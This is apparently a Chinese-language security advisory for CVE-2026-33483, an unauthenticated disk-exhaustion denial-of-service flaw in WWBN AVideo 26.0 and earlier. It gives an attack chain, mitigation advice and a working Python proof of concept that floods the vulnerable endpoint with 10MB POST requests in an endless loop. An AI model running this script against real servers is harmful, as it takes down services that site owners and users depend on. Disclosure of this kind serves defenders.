CVE-2026-33483 CVSS 7.5 高危

CVE-2026-33483 AVideo磁盘耗尽拒绝服务漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33483

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo 是一个开源视频平台。在 26.0 及以下版本中，`aVideoEncoderChunk.json.php` 端点存在安全漏洞。该脚本缺乏身份验证和资源限制，允许未经身份验证的远程攻击者通过发送任意 POST 数据，在服务器 `/tmp` 目录下写入无大小限制的临时文件，从而导致磁盘空间耗尽，引发服务器拒绝服务。

技术细节

该漏洞源于 WWBN AVideo 组件中 `aVideoEncoderChunk.json.php` 脚本的设计缺陷。该脚本是完全独立的，未包含框架的任何身份验证检查，也未设置资源限制。攻击者可以利用网络向量（AV:N），在无需交互（UI:N）且无需任何权限（PR:N）的情况下，向该端点发起攻击。具体利用方式是发送包含大量无效数据的 POST 请求，脚本会将这些数据无限制地写入服务器 `/tmp` 目录下的临时文件。由于缺乏文件大小上限、速率限制以及自动清理机制，攻击者能够轻易耗尽服务器的磁盘存储空间。这种资源耗尽会导致系统无法创建新文件、写入日志或处理正常请求，最终引发全站的拒绝服务。

攻击链分析

STEP 1

1. 漏洞发现

攻击者识别出目标服务器运行的是 WWBN AVideo 26.0 或更低版本，并发现存在未授权访问的 aVideoEncoderChunk.json.php 端点。

STEP 2

2. 发送恶意请求

攻击者向该端点发送大量包含任意数据的 POST 请求，无需任何身份验证。

STEP 3

3. 写入临时文件

服务器将接收到的数据写入 /tmp 目录下的持久化临时文件中，由于无大小限制，文件不断增大。

STEP 4

4. 资源耗尽

持续的数据写入导致服务器磁盘空间被完全占满。

STEP 5

5. 拒绝服务

由于磁盘已满，服务器无法写入日志或创建新文件，导致 Web 服务及系统功能瘫痪，实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target-site/avideo/aVideoEncoderChunk.json.php"

# Generate large payload to consume disk space
payload = "A" * 1024 * 1024 * 10  # 10MB of data

try:
    while True:
        # Send POST request without authentication
        response = requests.post(target_url, data={"data": payload})
        if response.status_code == 200:
            print("Payload sent successfully, disk space being consumed...")
        else:
            print(f"Request failed with status code: {response.status_code}")
            break
except KeyboardInterrupt:
    print("Attack stopped by user.")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

建议立即在 Web 服务器（如 Nginx 或 Apache）配置文件中，限制对 `aVideoEncoderChunk.json.php` 路径的访问，例如仅允许本地回环地址或特定管理 IP 访问。此外，应配置系统监控磁盘使用率，一旦发现异常增长及时告警并清理临时文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表